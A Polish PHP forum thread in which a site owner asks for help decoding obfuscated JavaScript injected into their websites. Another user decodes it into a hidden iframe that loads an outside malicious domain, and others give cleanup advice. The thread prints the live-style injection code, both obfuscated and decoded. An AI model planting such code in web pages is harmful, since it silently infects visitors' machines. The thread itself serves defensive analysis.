Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: rozszyfrowanie kodu
Forum PHP.pl > Inne > Hydepark
karis
1.03.2009, 19:37:38
czesc

bardzo was prosze pomozcie mi rozszyforwac ten kod, bo ktos go wstrzyknal na moje serwisy internetowe i to jest wirus tzn sciaga sie wirus i teraz ktos moim kompoem zarzadza i wysyla jakies informacje na gg innym


Kod
<!-- ad --><script>
  uyimh=687;
  qxcxg=4804;
  ddytx=7948;
  xkjpv="write";
  mzsrv="me";
  zqfqw="et";
  gdtrk="/' st";
  rpiia="yl";
  qxaol="";
  ldlvw="i";
  zfhuu="ty";
  hvkhb=":h";
  hbqmm="d";
  hauzn="";
  zdqdp=4;
  sjgbi="if";
  rpygo="r";
  syjnh=" sr";
  rwanv="c";
  elujl="=";
  hrgnc=863;
  akzpp=8853;
  tplxn=" ";
  cvtot="</";
  qtndm="";
  jlooz=3953;
  uyimh=687;
  qxcxg=4804;
  ddytx=7948;
  xkjpv="write";
  mzsrv="me";
  zqfqw="et";
  gdtrk="/' st";
  rpiia="yl";
  qxaol="";
  ldlvw="i";
  zfhuu="ty";
  hvkhb=":h";
  hbqmm="d";
  hauzn="";
  zdqdp=4;
  sjgbi="if";
  rpygo="r";
  syjnh=" sr";
  rwanv="c";
  elujl="=";
  hrgnc=863;
  akzpp=8853;
  tplxn=" ";
  cvtot="</";
  qtndm="";
  jlooz=3953;
  gftzo=(9.007e3>=5e1?uyimh:qxcxg);
  jjaqh=(ddytx>.2438?xkjpv:3.);
  gmbpt=(7.3e1>=36?mzsrv:.45);
  zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
  hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
  rmtyf=(6.5e1,"");
  
  aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>":64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad --></BODY></HTML>
  <script type="text/javascript"><!--
Foxx
1.03.2009, 19:40:55
Usuń dodany kod z plików, zmień hasła na kontach, nie wprowadzaj ich do total commandera i innych managerów ftp, przeskanuj komputer. Wirus to chyba VBS:Malware-gen.
karis
1.03.2009, 19:47:39
a moze mi ktos ten kod rozszyfroac bo chce wiedziec co dokladnie sie tam robi
tommy4
1.03.2009, 19:57:54
A skąd my mamy mieć pewność, że to nie Ty napisałeś 'wirusa' i przypadkiem nie chcesz, żebyśmy odpalili skrypt powyżej? winksmiley.jpg
karis
1.03.2009, 19:58:53
pewnosci nie macie zadnej chce jedynie abyscie pomogli mi go rozszyfrowac nie musicie nic odpalac chce znac adres strony z ktora sie laczy
erix
1.03.2009, 21:29:41
Z tego, co po kodzie widać, to podałeś tylko pierwszą część, czyli zakodowany skrypt. Ale dekodera tu nie widzę. winksmiley.jpg
karis
1.03.2009, 21:31:39
probowalem sobie w edytorze za pomoca funkcji fin&replace i rozszyfrowalem tylko pokazanie diva natomiast adresu nie do konca rozszyforwalem
l0ud
1.03.2009, 21:48:58
Kod
<iframe src="http://truittbros.net/" style="visibility: hidden;"></iframe>
Kocurro
1.03.2009, 21:55:20
A na przyszłość polecam korzystanie z Firebug'a - nie traciłbyś czasu na pisanie posta na forum...
Orkan
3.03.2009, 00:02:20
Cytat(l0ud @ 1.03.2009, 23:48:58 ) *
Kod
<iframe src="http://truittbros.net/" style="visibility: hidden;"></iframe>


a kto zjadl document.write() ? czarodziej.gif
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.